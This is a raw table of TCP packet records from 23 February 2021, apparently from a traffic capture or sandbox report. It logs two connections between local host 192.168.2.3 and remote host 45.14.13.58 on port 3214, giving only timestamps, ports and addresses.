Feb 23, 2021 17:48:17.225605965 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.225626945 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.225629091 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.225650072 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.225682020 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.225718975 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.225764990 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.226114035 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.226217985 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.226249933 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.226274967 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.226349115 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.226378918 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.226406097 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.226443052 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.226514101 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.227332115 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.227350950 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.227451086 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.227454901 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.227502108 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.227509975 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.227514982 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.227560997 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.227627993 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.227665901 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.227740049 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.227968931 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.228231907 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.228313923 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.228336096 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.228374958 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.228487968 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.228502989 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.228657961 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.229705095 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229723930 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229733944 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229748011 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229763031 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229777098 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229790926 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229796886 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.229804993 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229837894 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229854107 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229870081 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229882956 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229897022 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.229897022 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229912043 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229928017 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.229942083 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.229962111 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.229988098 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230024099 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230024099 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230063915 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230144024 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230288982 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230304003 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230351925 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230365992 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230381966 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230415106 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230448961 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230506897 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230551958 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230616093 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230635881 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230698109 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230762959 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230846882 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230920076 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230931044 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.230990887 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.230994940 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.231034040 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.231093884 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.231116056 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.231323957 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.231404066 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.232251883 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.232495070 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.232604027 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.276439905 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.276479959 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.276495934 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.276595116 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.276613951 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.276667118 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.276712894 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.276721001 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.276729107 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.276948929 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.276966095 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.277050972 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.277080059 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.277112007 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.277126074 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.277183056 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.277251005 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.277704000 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.277798891 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.277827024 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.277859926 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.278132915 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.278264046 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.278373957 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.278575897 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.278606892 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.278806925 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.278839111 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.278865099 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279016018 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279145956 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279175043 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279201984 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279232025 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279258013 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279700994 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279778957 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279928923 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.279954910 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280036926 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280148983 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280179024 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280236006 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280263901 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280452967 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280488968 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280519962 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280613899 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280695915 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280726910 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280752897 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280780077 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.280975103 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.281007051 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.281032085 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.281132936 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.281162977 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.281425953 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.281456947 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282170057 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282208920 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282335043 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282371998 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282461882 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282727003 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282752991 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282886982 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.282963037 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283055067 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283107996 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283209085 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283246994 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283279896 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283304930 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283406973 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283489943 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283560038 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283652067 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283715963 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283883095 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.283910036 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284029007 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284068108 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284099102 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284193039 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284223080 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284270048 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284410000 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284440994 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284475088 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284559965 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284645081 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284930944 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.284957886 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285120964 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285252094 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285317898 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285451889 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285484076 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285509109 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285732985 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.285851002 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329245090 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329304934 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329324961 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329350948 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329508066 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329545021 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329605103 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329696894 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.329983950 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.330043077 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.330178976 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.330267906 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.330413103 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.330707073 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.330811977 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.330838919 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.331048012 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.331127882 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.331249952 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.331497908 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.332366943 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.332397938 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.332422972 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.332448959 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.541506052 CET	3214	49726	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.548268080 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.600642920 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.600882053 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.602638960 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.655700922 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.658634901 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.711162090 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.711196899 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.711287022 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.711333990 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.711409092 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.711429119 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.712177992 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.712215900 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.712313890 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.712430000 CET	49726	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.763652086 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.763681889 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.763704062 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.763796091 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.763845921 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.763859987 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.763875961 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.763907909 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.763953924 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.763989925 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.764910936 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.764935970 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.765038967 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.765045881 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.766773939 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816231966 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816260099 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816272020 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816294909 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816390991 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816442013 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816493988 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816514015 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816589117 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816610098 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816687107 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816716909 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816731930 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816761971 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816798925 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.816864967 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.816977978 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817035913 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.817234993 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817344904 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817433119 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.817506075 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817538023 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817610025 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817621946 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.817679882 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817707062 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.817749023 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.819045067 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.820260048 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.868952990 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869004965 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869029999 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869050026 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869128942 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.869134903 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869185925 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.869214058 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869271994 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.869339943 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869491100 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869560957 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.869684935 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869771004 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869829893 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.869931936 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.869954109 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870006084 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.870007038 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870170116 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870191097 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870223999 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.870249987 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.870295048 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870352030 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870400906 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.870799065 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870856047 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.870932102 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.870978117 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.871048927 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.871113062 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.871135950 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.871156931 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.871210098 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.871216059 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.871267080 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.871326923 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.871356010 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.871376991 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.871510029 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.872201920 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.872231007 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.872261047 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.872287035 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.872322083 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.872740984 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.872765064 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.872829914 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.921756983 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.921772957 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.921803951 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.921855927 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.921890020 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.921906948 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.921951056 CET	49728	3214	192.168.2.3	45.14.13.58
Feb 23, 2021 17:48:17.921952009 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922019005 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922142029 CET	3214	49728	45.14.13.58	192.168.2.3
Feb 23, 2021 17:48:17.922173977 CET	3214	49728	45.14.13.58	192.168.2.3
